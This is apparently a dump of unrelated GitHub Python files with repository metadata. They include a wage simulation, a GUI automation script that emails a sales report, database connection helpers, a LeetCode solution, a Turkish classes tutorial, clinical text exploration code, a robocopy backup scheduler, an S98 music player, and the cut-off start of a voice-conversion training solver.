+{"seq_id":"3923119200","text":"\"\"\"wages simulation\"\"\"\nfrom simulation.base import SimulationCategory, SimulationBase, Effect, 
SimulationEmotion\n\n\nclass WagesSimulation(SimulationBase):\n\t\"\"\"\n\t\twages simulation\n\t\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\n\t\t\t\"Wages\",\n\t\t\t\"The average wage level in your country. Wages are generally set by supply and demand, which roughly \"\n\t\t\t\"equates to the labor supply and the state of the economy (GDP). Immigration raises the labor supply, \"\n\t\t\t\"reducing wages, and high unemployment will also put downward pressure on wages. Labor laws, including \"\n\t\t\t\"minimum wages can push wages artificially higher, although this will have side-effects.\",\n\t\t\tSimulationCategory.economy,\n\t\t\t'simulation_wages.png',\n\t\t\t0.5,\n\t\t\temotion=SimulationEmotion.high_good\n\t\t)\n\t\t\n\t\t# connections:\n\t\tself.effects.append(Effect('_low_income', '-0.5 + (1.0 * x)'))\n\t\tself.effects.append(Effect('_middle_income', '-0.3 + (0.6 * x)'))\n\t\tself.effects.append(Effect('worker_productivity', '0.2 - (0.4 * x)'))\n","repo_name":"mrommel/SmartPopulation","sub_path":"simulation/simulations/wages.py","file_name":"wages.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9416088370","text":"import pyautogui # allow automations (screen, mouse and keyboard)\r\nimport time # delay\r\nimport pyperclip # allow automations\r\nimport pandas as pd # the \"pandas\" is for data analysis!\r\n\r\npyautogui.PAUSE = 1 # Os códigos serão executados em um intervalo de 1seg)\r\n\r\n# Step 1\r\n# Open Google on Desktop\r\ntime.sleep(4)\r\npyautogui.click(435,210, clicks=2)\r\n# Enter system link\r\npyautogui.click(485, 52)\r\npyautogui.write('https://drive.google.com/drive/folders/149xknr9JvrlEnhNWO49zPcw0PW5icxga')\r\npyautogui.press('enter')\r\n\r\n# Step 2\r\ntime.sleep(4)\r\npyautogui.click(396, 301, clicks=2)\r\ntime.sleep(1)\r\n\r\n# Step 3\r\npyautogui.click(407,371) # click on file\r\ntime.sleep(0.5)\r\npyautogui.click(1156,190) # click on the \"3 dots\"\r\ntime.sleep(2)\r\npyautogui.click(968,570) # click \"download\"\r\ntime.sleep(8)\r\npyautogui.click(496,414) # click \"save\"\r\n\r\n# Passo 4\r\ntabela = pd.read_excel(r\"C:\\Users\\LUCAS\\Downloads\\Vendas - Dez.xlsx\") # this \"r\" is important for python to understand the file path\r\nfaturamento = tabela[\"Valor Final\"].sum() # the sum of the \"Valor Final\" column\r\nquantidade = tabela[\"Quantidade\"].sum() # the sum of the \"Quantidade\" column\r\ndisplay(tabela)\r\n\r\n# Step 5\r\n# Open a new tab\r\ntime.sleep(4)\r\npyautogui.click(435,210, clicks=2)\r\n\r\n# Sign in to gmail\r\npyautogui.click(485, 52)\r\npyautogui.write('https://mail.google.com/')\r\npyautogui.press('enter')\r\ntime.sleep(8)\r\n\r\n# Click on the 'Write' button\r\npyautogui.click(98,208)\r\ntime.sleep(0.5)\r\n\r\n# Enter who we are sending to\r\npyautogui.write('lucascabralmendes.correa@gmail.com')\r\npyautogui.press('tab') # select email\r\npyautogui.press('tab') # move to email subject field\r\n\r\n# Enter the subject\r\nassunto = \"Relatório de Vendas de Ontem\"\r\npyperclip.copy(assunto)\r\npyautogui.hotkey(\"ctrl\", 'v')\r\npyautogui.press('tab') # move to email body field\r\n\r\n# Enter the body of the email\r\ntexto_email = f\"\"\"\r\nPrezados, bom dia\r\n\r\nO faturamento de ontem foi de: R${faturamento:,.2f}\r\nA quantidade de produtos foi de: {quantidade:,}\r\n\r\nAbs\r\nLucas Cabral\r\n\"\"\"\r\npyperclip.copy(texto)\r\npyautogui.hotkey(\"ctrl\", 'v')\r\n\r\n# click send\r\npyautogui.hotkey('ctrl', 
'enter')\r\n","repo_name":"Lcmc23/data-science","sub_path":"Project 1/base code - project 1.py","file_name":"base code - project 1.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72035587730","text":"from sshtunnel import SSHTunnelForwarder\nfrom configparser import ConfigParser\nfrom peewee import PostgresqlDatabase\nfrom pymongo import MongoClient\nimport psycopg2\n\nconfig = ConfigParser()\nconfig.read('database.cfg')\nglobal_config = config['global']\n\npostgres_ssh_tunnel_config = config['postgres_ssh_tunnel']\npostgres_database_config = config['postgres']\n\nmongodb_ssh_tunnel_config = config['mongodb_ssh_tunnel']\nmongodb_database_config = config['mongodb']\n\npostgres_ssh_tunnel = None\npostgres_database = PostgresqlDatabase(\n postgres_database_config.get('db_name'),\n host=postgres_database_config.get('db_host'),\n port=postgres_database_config.getint('db_port'),\n user=postgres_database_config.get('db_user'),\n password=postgres_database_config.get('db_password'),\n)\nmongodb_ssh_tunnel = None\nmongodb_database = MongoClient(None)\n\n\ndef open_ssh_tunnel(ssh_tunnel_config):\n ssh_tunnel = SSHTunnelForwarder(\n ssh_address_or_host=ssh_tunnel_config.get('ssh_host'),\n ssh_port=ssh_tunnel_config.getint('ssh_port'),\n ssh_username=ssh_tunnel_config.get('ssh_username'),\n ssh_password=ssh_tunnel_config.get('ssh_password'),\n remote_bind_address=(\n ssh_tunnel_config.get('remote_address'),\n ssh_tunnel_config.getint('remote_port')\n ),\n local_bind_address=(\n ssh_tunnel_config.get('local_address'),\n ssh_tunnel_config.getint('local_port')\n )\n )\n ssh_tunnel.start()\n if not ssh_tunnel.is_active:\n raise Exception('Could not start SSH tunnel')\n return ssh_tunnel\n\n\ndef psycopg2_connect():\n global postgres_ssh_tunnel\n print('Connecting to database with psycopg2...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and postgres_ssh_tunnel is None:\n postgres_ssh_tunnel = open_ssh_tunnel(postgres_ssh_tunnel_config)\n connection = psycopg2.connect(\n dbname=postgres_database_config.get('db_name'),\n host=postgres_database_config.get('db_host'),\n port=postgres_database_config.getint('db_port'),\n user=postgres_database_config.get('db_user'),\n password=postgres_database_config.get('db_password'),\n )\n print('Connected!')\n return connection\n except Exception:\n if postgres_ssh_tunnel:\n postgres_ssh_tunnel.close()\n\n raise\n\n\ndef postgres_connect() -> PostgresqlDatabase:\n global postgres_ssh_tunnel\n global postgres_database\n print('Connecting to database with peewee...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and postgres_ssh_tunnel is None:\n postgres_ssh_tunnel = open_ssh_tunnel(postgres_ssh_tunnel_config)\n if postgres_database.is_closed():\n postgres_database.connect()\n print('Connected!')\n return postgres_database\n except Exception:\n if postgres_ssh_tunnel:\n postgres_ssh_tunnel.close()\n\n if postgres_database:\n postgres_database.close()\n\n raise\n\n\ndef mongodb_connect() -> MongoClient:\n global mongodb_ssh_tunnel\n global mongodb_database\n print('Connecting to database with pymongo...')\n\n try:\n if global_config.getboolean('use_ssh_tunnel') and mongodb_ssh_tunnel is None:\n mongodb_ssh_tunnel = open_ssh_tunnel(mongodb_ssh_tunnel_config)\n mongodb_database = MongoClient(\n authSource=mongodb_database_config.get('db_name'),\n host=mongodb_database_config.get('db_host'),\n port=mongodb_database_config.getint('db_port'),\n 
username=mongodb_database_config.get('db_user'),\n password=mongodb_database_config.get('db_password'),\n authMechanism='DEFAULT',\n ).dbd2g10\n print('Connected!')\n return mongodb_database\n except Exception:\n if mongodb_ssh_tunnel:\n mongodb_ssh_tunnel.close()\n\n if mongodb_database:\n mongodb_database.close()\n\n raise\n","repo_name":"giannilabella/python-orm-db2-um","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73706517329","text":"class Solution(object):\n def maxSubArray(self, nums: List[int]) -> int:\n maxSum = currentSum = nums[0]\n\n for n in nums[1:]:\n # if we were sure there are positive numbers in array (at least 1),\n # we could od (if currentSum < 0) -- drop and start over using the next number.\n # But that's not true, and we still need to cope with data like [-2,-1,-3]\n # So we start over when the previous sum is less than the current element\n if currentSum + n < n:\n currentSum = n\n else:\n currentSum += n\n # or, we can write:\n # currentSum = max(nums[i], currentSum + nums[i])\n\n maxSum = max(maxSum, currentSum)\n\n return maxSum\n","repo_name":"ululam/leetcode","sub_path":"0053-maximum-subarray/0053-maximum-subarray.py","file_name":"0053-maximum-subarray.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21237433247","text":"# classlar-sınıflar -start\n# fonksiyon ve değerleri- değişkenleri içerisinde tutabilen nesneler\n# oop- nesne yönelimli programlamada bu fonksiyonları burada tanımlamak yerine programladığımız alanları nesne olarak ele alıp bu nesnelere atama yapacağız\n# classlar da fonksiyonlar gibi tanımlanıyor tanımlanırken fonksiyonlarda kullanılan \"def\" kullanılmıyor \"class\" keyword ü tanımlanıyor.\n\nclass Human: #\":\" kullanıldığı için alt satırda yine bir tab içeri girilerek işlem yapılıyor. \n#içerisine fonksiyon tanımladığımız için yine \"def\" ile devam ediyoruz.\n #name= \"Özge\"\n #built -in\n def __init__(self,name):\n self.name= name\n print(\"Bir human instance'ı üretildi.\") #yapıcı blok alanı oluşturuldu. Biz bir nesne ürettiğimizde nesnenin çalıştırdığı bir alan oluşur. initialize ediyomuşuz gibi düşünebiliriz. yeni bir obje üretilmiş.\n #bir yapı üretilirken her zaman üretilmesi gereken bir değişken olabilir o yüzden yapıyoruz.\n def __str__(self) -> str:\n return f\"STR Fonksiyonundan dönen değer: {self.name}\" #return bir önceki elemana döndürür.\n def talk(self,sentence,):\n #name= \"Ercan\"\n print(f\"{self.name}: {sentence}\")\n #print(f\"{name}: {sentence}\")\n def walk(self):\n print(f\"{self.name} is walking..\")\n\n# instance => örnek #nesnelere erişebilmemiz için o nesnelerden birer örnek-instance oluşturabilmemiz gerekiyor\n# self => fonksiyonun kendisini ifade ediyor. Class içerisinde tanımlanan her fonksiyon için ilk parametre self parametresiyle rezerve edilmiştir. \n# self yerine humanobject yazılabilir. yani self yerine başka bir şey de yazabiliriz. self yazmak tercih edilebilir.\n\nhuman1= Human(\"Enes\")\nhuman1.name= \"Enes\" #bu satırın talk satırının 1 satır üstünde yapılması çıktıyı doğru görebilmemiz açısından önemli! 
#self.name ile yazılan ismi değiştirecektir\nhuman1.talk (\"Merhaba\")\nhuman1.walk()\nprint(human1)\n\nhuman2= Human(\"Cem\")\nhuman2.name= \"Cem\"\nhuman2.talk(\"Selam\")\nhuman2.walk()\nprint(human2)\n\nhuman3= Human(\"Özge\")\nhuman3.talk(\"Selam\")\nhuman3.walk()\nprint(human3)\n\nHuman(\"Melike\").talk(\"Merhaba\")\n\n# classlar-sınıflar -end\n\n\n\n\n\n\n\n\n\n\n#modules -end","repo_name":"ozgecetiner/Workshop","sub_path":"workshopday5class.py","file_name":"workshopday5class.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13921843826","text":"import pandas as pd\n\nimport glob\nimport unicodedata\nimport re\nimport csv\nimport numpy as np\nimport pprint\nimport os\n\nimport string\n\nall_letters = string.ascii_letters + \" .,;':\"\nn_letters = len(all_letters)\nprint(all_letters)\nentity_dict = {\"MEDICATION\": \"Drug\",\n \"FREQUENCY\": \"Frequency\",\n \"ROUTE_OR_MODE\": \"Route\",\n \"DOSAGE\":\"Dosage\",\n \"STRENGTH\": \"Strength\",\n \"FORM\": \"Form\",\n \"DURATION\": \"Duration\"}\n\nentities_re = re.compile('(%s)' % '|'.join(entity_dict.keys()))\ndef replace_entities_n2c2(s):\n def replace(match):\n return entity_dict[match.group(0)]\n return entities_re.sub(replace, s)\n\n\ndef find_files(path):\n \"\"\"\n returns a list of files in a path\n \"\"\"\n return glob.glob(path)\n\ndef flatten_json(y):\n \"\"\"\n :param y: the json you want to flatten\n :return: flattened json\n \"\"\"\n\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\ndef flatten_list(l):\n \"\"\"\n input is list [[ ]]\n returns flattened list\n \"\"\"\n return [item for sublist in l for item in sublist]\n\ndef unicode_to_ascii(s):\n \"\"\"\n Turn a Unicode string to plain ASCII, thanks to http://stackoverflow.com/a/518232/2809427\n \"\"\"\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in all_letters\n )\n\n\ndef normalizeStringAndDigitsLower(s):\n s = unicode_to_ascii(s.lower().strip())\n s = re.sub(r\"([,.:!?])\", r\" \\1 \", s)\n s = re.sub(r\"[\\|]+\", r\" \", s)\n s = re.sub('\\n', '', s)\n s = re.sub('\\t', ' ', s)\n s = re.sub('\\d+', '#', s)\n s = re.sub(' +', ' ', s)\n return s\n\n\ndef build_vocab(vocab_min, infile, vocab_filename):\n \"\"\"\n INPUTS:\n vocab_min: how many documents a word must appear in to be kept\n infile: (training) data file to build vocabulary from\n vocab_filename: name for the file to output\n \"\"\"\n with open(infile, 'r') as csvfile:\n reader = csv.reader(csvfile)\n # header\n next(reader)\n\n # 0. read in data\n print(\"reading in data...\")\n # holds number of terms in each document\n note_numwords = []\n # indices where notes start\n note_inds = [0]\n # indices of discovered words\n indices = []\n # holds a bunch of ones\n data = []\n # keep track of discovered words\n vocab = {}\n # build lookup table for terms\n num2term = {}\n # preallocate array to hold number of notes each term appears in\n note_occur = np.zeros(400000, dtype=int)\n i = 0\n for row in reader:\n text = row[2]\n numwords = 0\n for term in text.split():\n # put term in vocab if it's not there. 
else, get the index\n index = vocab.setdefault(term, len(vocab))\n indices.append(index)\n num2term[index] = term\n data.append(1)\n numwords += 1\n # record where the next note starts\n note_inds.append(len(indices))\n indset = set(indices[note_inds[-2]:note_inds[-1]])\n # go thru all the word indices you just added, and add to the note occurrence count for each of them\n for ind in indset:\n note_occur[ind] += 1\n note_numwords.append(numwords)\n i += 1\n # clip trailing zeros\n note_occur = note_occur[note_occur > 0]\n\n # turn vocab into a list so indexing doesn't get fd up when we drop rows\n vocab_list = np.array([word for word, ind in sorted(vocab.items(), key=operator.itemgetter(1))])\n\n # 1. create sparse document matrix\n C = csr_matrix((data, indices, note_inds), dtype=int).transpose()\n # also need the numwords array to be a sparse matrix\n note_numwords = csr_matrix(1. / np.array(note_numwords))\n\n # 2. remove rows with less than 3 total occurrences\n print(\"removing rare terms\")\n # inds holds indices of rows corresponding to terms that occur in < 3 documents\n inds = np.nonzero(note_occur >= vocab_min)[0]\n print(str(len(inds)) + \" terms qualify out of \" + str(C.shape[0]) + \" total\")\n # drop those rows\n C = C[inds, :]\n note_occur = note_occur[inds]\n vocab_list = vocab_list[inds]\n\n print(\"writing output\")\n with open(vocab_filename, 'w') as vocab_file:\n for word in vocab_list:\n vocab_file.write(word + \"\\n\")\n\n\ndef letterToIndex(letter):\n \"\"\"\n find index for all letters\n \"\"\"\n return all_letters.find(letter)\n\n\n# def letterToTensor(letter):\n# \"\"\"\n# Just for demonstration, turn a letter into a <1 x n_letters> Tensor\n# \"\"\"\n# tensor = torch.zeros(1, n_letters)\n# tensor[0][letterToIndex(letter)] = 1\n# return tensor\n#\n#\n# def lineToTensor(line):\n# \"\"\"# Turn a line into a , or an array of one-hot letter vectors\"\"\"\n# tensor = torch.zeros(len(line), 1, n_letters)\n# for li, letter in enumerate(line):\n# tensor[li][0][letterToIndex(letter)] = 1\n# return tensor\n\n\nall_CNER_words = {}\nall_CNER_labels = []\n\n\n# Read a file and split into lines\ndef read_norm_lines(filename):\n lines = open(filename, encoding='utf-8').read().strip().split('\\n')\n return [line.split('||') for line in lines]\n\ndef make_dictionary_annotations_and_text(name):\n text_file_path = str(name) + \".txt\"\n text_norm_path = str(name) + \".norm\"\n note_text = open(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_note', text_file_path)).read()\n list_norm_annotations = read_norm_lines(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm', text_norm_path))\n annotation_dictionary = {'id': [], 'concept': [],\n 'beginCharacterOffset': [],\n 'endCharacterOffset': [],\n 'text': [],\n 'disjointed_concept': [],\n 'additionalBeginCharacterOffset': [],\n 'additionalEndCharacterOffset': [],\n 'additionalText': []}\n for list_norm in list_norm_annotations:\n annotation_dictionary['id'].append(list_norm[0])\n annotation_dictionary['concept'].append(list_norm[1])\n annotation_dictionary['beginCharacterOffset'].append(list_norm[2])\n annotation_dictionary['endCharacterOffset'].append(list_norm[3])\n annotated_text = note_text[int(list_norm[2]): int(list_norm[3])]\n annotation_dictionary['text'].append(annotated_text)\n if len(list_norm) < 5:\n annotation_dictionary['disjointed_concept'].append(None)\n annotation_dictionary['additionalBeginCharacterOffset'].append(None)\n 
annotation_dictionary['additionalEndCharacterOffset'].append(None)\n annotation_dictionary['additionalText'].append(None)\n else:\n annotation_dictionary['disjointed_concept'].append('Y')\n annotation_dictionary['additionalBeginCharacterOffset'].append(list_norm[4])\n annotation_dictionary['additionalEndCharacterOffset'].append(list_norm[5])\n annotation_dictionary['additionalText'].append(note_text[int(list_norm[4]): int(list_norm[5])])\n\n return pd.DataFrame(annotation_dictionary)[['concept',\n 'beginCharacterOffset',\n 'endCharacterOffset',\n 'text',\n 'disjointed_concept',\n 'additionalBeginCharacterOffset',\n 'additionalEndCharacterOffset',\n 'additionalText']] #.to_dict('records')# list_norm_annotations\n\n\n# pprint.pprint(make_dictionary_annotations_and_text('0038').to_dict('split'))\n\nexample_list_norm_annot = read_norm_lines(filename='/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm/0214.norm')\n\ndef count_CUI(list_norm_annotations):\n \"\"\"\n this function takes a list of lists (with the norm annotations) and returns stats\n :param list_norm_annotations: '\n :return: counts of CUI, counts of CUI_less, counts of disjointed_CUI\n \"\"\"\n counter = 0\n disjointed_cui_counter = 0\n cui_less_counter = 0\n for line in list_norm_annotations:\n counter += 1\n if line[1] == 'CUI-less':\n cui_less_counter += 1\n if len(line) > 4:\n disjointed_cui_counter += 1\n\n return counter,cui_less_counter, disjointed_cui_counter\n\n\n\n\ndef return_eda_stats(file_list_path):\n \"\"\"\n\n :param file_list_path: pathname of file containing a list of core-names of .txt/text.norm files (for example:\n :return: a pandas data-frame with counts from each file\n \"\"\"\n file_list_text = open(file_list_path, encoding='utf-8').read().strip().split('\\n')\n path_name_main_list = [str(name_in_list) for name_in_list in file_list_text]\n eda_stats_dictionary = {'file_name_main': [],\n 'note_lines_count': [],\n 'CUI_count': [],\n 'CUI_less_count': [],\n 'disjointed_CUI_count': []\n }\n for path_name_main in path_name_main_list:\n eda_stats_dictionary['file_name_main'].append(path_name_main)\n text_file_path = str(path_name_main) + \".txt\"\n text_norm_path = str(path_name_main) + \".norm\"\n note_text_lines = open(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_note',\n text_file_path), encoding='utf-8').read().strip().split('\\n')\n eda_stats_dictionary['note_lines_count'].append(str(len(note_text_lines)))\n list_norm_annotations = read_norm_lines(os.path.join('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm', text_norm_path))\n eda_stats_dictionary['CUI_count'].append(count_CUI(list_norm_annotations)[0])\n eda_stats_dictionary['CUI_less_count'].append(count_CUI(list_norm_annotations)[1])\n eda_stats_dictionary['disjointed_CUI_count'].append(count_CUI(list_norm_annotations)[2])\n\n return pd.DataFrame(eda_stats_dictionary)\n\n\n\ndef calculate_average(*args):\n '''\n Function that accept variable length arguments\n :param args: numbers\n :return: average of numbers passed through\n '''\n num = len(args)\n if num == 0:\n return 0\n sum_of_numbers = 0\n for elem in args:\n sum_of_numbers += elem\n return sum_of_numbers / num\n\neda_stats_train = return_eda_stats('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_file_list.txt')\neda_stats_train.to_csv('eda_stats_train.csv', index=False)\n\n\n\n#\n# def amazon_convert_n2c2(amazon_output_list, outfile_path):\n# counter = 0\n# with 
open(outfile_path,'w') as f:\n# for x in flatten_list(example_list):\n# counter += 1\n# new_line = \"T\" + str(counter) + \"\\t\" + replace_entities_n2c2(x['Category']) + \"\\t\" + str(x['BeginOffset']) + \"\\t\" + str(x['EndOffset']) + \"\\t\" + x['Text']\n# print(new_line)\n# f.write(new_line + os.linesep)\n# if x.get('Attributes') != None:\n# attribute_list = x.get('Attributes')\n# for a in attribute_list:\n# counter += 1\n# a_line = \"T\" + str(counter) + \"\\t\" + replace_entities_n2c2(a['Type']) + \"\\t\" + str(a['BeginOffset']) + \"\\t\" + str(a['EndOffset']) +\"\\t\" + re.sub(\"\\n\", \" \",\n# a['Text'])\n# print(a_line)\n# f.write(a_line + os.linesep)\n# print(counter)\n\n# pprint.pprint(read_norm_lines('/Users/isabelmetzger/PycharmProjects/ClinicalScorecard/data/train/train_norm/0070.norm'))","repo_name":"izzykayu/ClinicalScorecard","sub_path":"exploring_notes.py","file_name":"exploring_notes.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19595492219","text":"import os\nimport shutil\nimport time\nimport _thread\n\n\n# Caminho do Diretório do arquivo script.py\ncwd = os.getcwd()\n\ndef run_service(line):\n \"\"\" # \"\"\"\n while True:\n values = line.split('_')\n copy_interval = values[3]\n copy_interval = int(copy_interval)\n data_origin = values[1]\n data_destiny = values[2]\n\n try:\n os.system(f'robocopy \"{data_origin}\" \"{data_destiny}\" /R:1 /W:1 /MIR')\n except:\n log = open(fr\"{cwd}/assets/log.txt\", \"a\", encoding='utf-8') #MUDAR ISSO QUANDO FOR FAZER O EXE retirar /sistema-copias\n log.write(f'Falha ao copiar arquivos de {data_origin} para {data_destiny} verifique os diretórios \\n')\n log.close()\n\n # local = os.listdir(data_origin)\n # local_to = os.listdir(data_destiny)\n # for data in local:\n # if(data in local_to):\n # pass\n \n # else:\n # try:\n # # shutil.copy(os.path.join(data_origin, data), data_destiny)\n # # log = open(fr\"{cwd}/assets/log.txt\", \"a\", encoding='utf-8') #MUDAR ISSO QUANDO FOR FAZER O EXE retirar /sistema-copias\n # # log.write(f'Arquivo {data} copiado com Sucesso \\n')\n # # log.close()\n # except:\n # print('Não copiado')\n\n time.sleep(copy_interval)\n\n# Abrindo arquivo com os agendamentos\narchive = open(fr\"{cwd}/assets/agendamentos.txt\", \"r\", encoding='utf-8')\narchive = archive.readlines()\n\nfor _line in archive:\n _thread.start_new_thread(run_service, (_line,))\n\nwhile True:\n pass\n ","repo_name":"tiagojunker/Projetos-Python","sub_path":"Sistema-copias/assets/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21624868567","text":"import re\r\nn = int(input())\r\nlist_ip = []\r\nfor i in range(n) :\r\n ip_address = input()\r\n list_ip.append(ip_address)\r\nfor i in range(len(list_ip)) :\r\n if len(list_ip[i]) <= 500 :\r\n ipv4 = re.match(r'^(25[0-5]|2[0-4]\\d|1\\d\\d|[0-9]?\\d)(\\.(25[0-5]|2[0-4]\\d|1\\d\\d|[0-9]?\\d)){3}$',list_ip[i])\r\n ipv6 = re.match(r'^([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{1,4}$',list_ip[i])\r\n if ipv4 :\r\n print('IPv4')\r\n elif ipv6 :\r\n print('IPv6')\r\n else :\r\n print('Bukan IP Address')","repo_name":"Riofuad/LAB-AP-02-2023","sub_path":"H071231076/Praktikum-8/TP8_2_H071231076.py","file_name":"TP8_2_H071231076.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"13239694865","text":"#!/usr/bin/env python\n\nfrom __future__ import division, print_function, unicode_literals\nimport argparse\nimport io\nimport os\nimport signal\nimport sys\nimport time\n\nfrom module_controller import ModuleController\nfrom m3u import M3U\nfrom s98.s98 import S98, S98Error\n\n\nclass S98Player:\n\n playlist = False\n show_tag = False\n cancel = False\n repeat = False\n loop_count = -1\n\n def __init__(self):\n self.mc = ModuleController()\n\n @property\n def modules(self):\n return self.mc.modules\n\n def play(self, filename):\n if self.playlist:\n self.__playlist(filename)\n else:\n self.__play(filename)\n\n def __play(self, filename):\n file_bytes = None\n\n with io.FileIO(filename, 'rb') as f:\n file_bytes = f.readall()\n\n with io.BytesIO(file_bytes) as data:\n self.__play_s98(data)\n\n def __play_s98(self, f):\n self.s98 = S98(f)\n self.s98.reset_handlers.append(self.mc.reset)\n self.s98.write_handlers.append(self.mc.write)\n self.s98.mute_handlers.append(self.mc.mute)\n self.s98.repeat = self.repeat\n self.s98.loop_count = self.loop_count\n\n # tag = self.s98.tag\n if self.show_tag == True and self.s98.tag is not None:\n print(self.s98.tag)\n pass\n\n self.s98.play()\n\n def __playlist(self, filename):\n self.playlist = M3U(filename)\n while not self.cancel:\n for file in self.playlist.files:\n if self.cancel:\n break\n print(file)\n self.__play(file)\n\n def stop(self):\n if self.s98 is not None and self.s98.playing:\n self.s98.stop()\n while self.s98.playing and not self.s98.stopped:\n pass\n del self.s98\n self.cancel = True\n\n\ndef break_handler(signal, frame):\n print(\"Interrupted.\")\n player.stop()\n\n\nparser = argparse.ArgumentParser(description='Playback S98 data.')\nparser.add_argument(\"-t\", \"--tag\", action=\"store_true\", help='show tag')\nparser.add_argument(\"-l\", \"--list\", action=\"store_true\", help='load M3U playlist')\nparser.add_argument(\"-m\", \"--module\", type=str, help='RE:birth module identifier')\nparser.add_argument(\"-r\", \"--repeat\", type=int, help='Repeat song')\nparser.add_argument(\"file\", type=str, help=\"S98 file\")\nargs = parser.parse_args()\n\nsignal.signal(signal.SIGINT, break_handler)\n\nplayer = S98Player()\nfor i, m in enumerate(args.module.split(\",\")):\n player.modules[i] = m\nif args.tag:\n player.show_tag = True\nif args.list:\n player.playlist = True\nif args.repeat != None:\n if args.repeat > 0:\n player.loop_count = args.repeat\n else:\n player.repeat = True\n\nplayer.play(args.file)\n\n","repo_name":"tettoon/vgmplayer-rpi-re","sub_path":"s98player.py","file_name":"s98player.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"74960301010","text":"from model import Generator_MI, Generator_Decoder\nfrom model import InterpLnr\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport pickle\nimport torch.nn as nn\nfrom mi_estimators import CLUBSample_reshape\nfrom utils import pad_seq_to_2, quantize_f0_torch, quantize_f0_numpy\nimport matplotlib.pyplot as plt\n# from VQ_Encoder import CPCLoss_sameSeq\n\ntorch.manual_seed(137)\n\n# use demo data for simplicity\n# make your own validation set as needed\nvalid_path = \"/ceph/home/yangsc21/Python/autovc/SpeechSplit/assets/test_mel/test.pkl\"\nvalidation_pt = pickle.load(open(valid_path, \"rb\"))\n\nMAX_LEN = 128 * 3\n\n\nclass Solver(object):\n \"\"\"Solver for training\"\"\"\n\n def 
__init__(self, vcc_loader, config, hparams):\n \"\"\"Initialize configurations.\"\"\"\n\n # Data loader.\n self.vcc_loader = vcc_loader\n self.hparams = hparams\n\n # Training configurations.\n self.num_iters = config.num_iters\n self.g_lr = config.g_lr\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.resume_iters = config.resume_iters\n self.lambda_cd = config.lambda_cd\n self.use_l1_loss = config.use_l1_loss\n self.use_VQCPC = config.use_VQCPC\n self.use_VQCPC_2 = config.use_VQCPC_2\n self.use_pitch = config.use_pitch\n self.use_adv = config.use_adv\n self.use_mi = config.use_mi\n self.advloss = nn.CrossEntropyLoss()\n self.device_ids = config.device_ids\n\n # Miscellaneous.\n self.use_tensorboard = config.use_tensorboard\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device('cuda:{}'.format(config.device_id) if self.use_cuda else 'cpu')\n\n # Directories.\n self.log_dir = config.log_dir\n self.sample_dir = config.sample_dir\n self.model_save_dir = config.model_save_dir\n\n # Step size.\n self.log_step = config.log_step\n self.sample_step = config.sample_step\n self.model_save_step = config.model_save_step\n\n # Build the model and tensorboard.\n self.build_model()\n self.build_model2()\n\n self.cp_mi_net = CLUBSample_reshape(hparams.dim_neck * 2, hparams.dim_neck_3 * 2, 512)\n self.rc_mi_net = CLUBSample_reshape(hparams.dim_neck_2 * 2, hparams.dim_neck * 2, 512)\n self.rp_mi_net = CLUBSample_reshape(hparams.dim_neck_2 * 2, hparams.dim_neck_3 * 2, 512)\n\n self.optimizer_cp_mi_net = torch.optim.Adam(self.cp_mi_net.parameters(), lr=3e-4)\n self.optimizer_rc_mi_net = torch.optim.Adam(self.rc_mi_net.parameters(), lr=3e-4)\n self.optimizer_rp_mi_net = torch.optim.Adam(self.rp_mi_net.parameters(), lr=3e-4)\n\n # self.cpc = CPCLoss_sameSeq(n_speakers_per_batch=256, n_utterances_per_speaker=8, n_prediction_steps=6,\n # n_negatives=10, z_dim=512+256, c_dim=256)\n #\n # self.cpc_2 = CPCLoss_sameSeq(n_speakers_per_batch=256, n_utterances_per_speaker=8, n_prediction_steps=6,\n # n_negatives=10, z_dim=2, c_dim=256)\n #\n # self.optimizer_cpc = torch.optim.Adam(self.cpc.parameters(), self.g_lr, [self.beta1, self.beta2])\n # self.optimizer_cpc_2 = torch.optim.Adam(self.cpc_2.parameters(), self.g_lr, [self.beta1, self.beta2])\n\n\n if 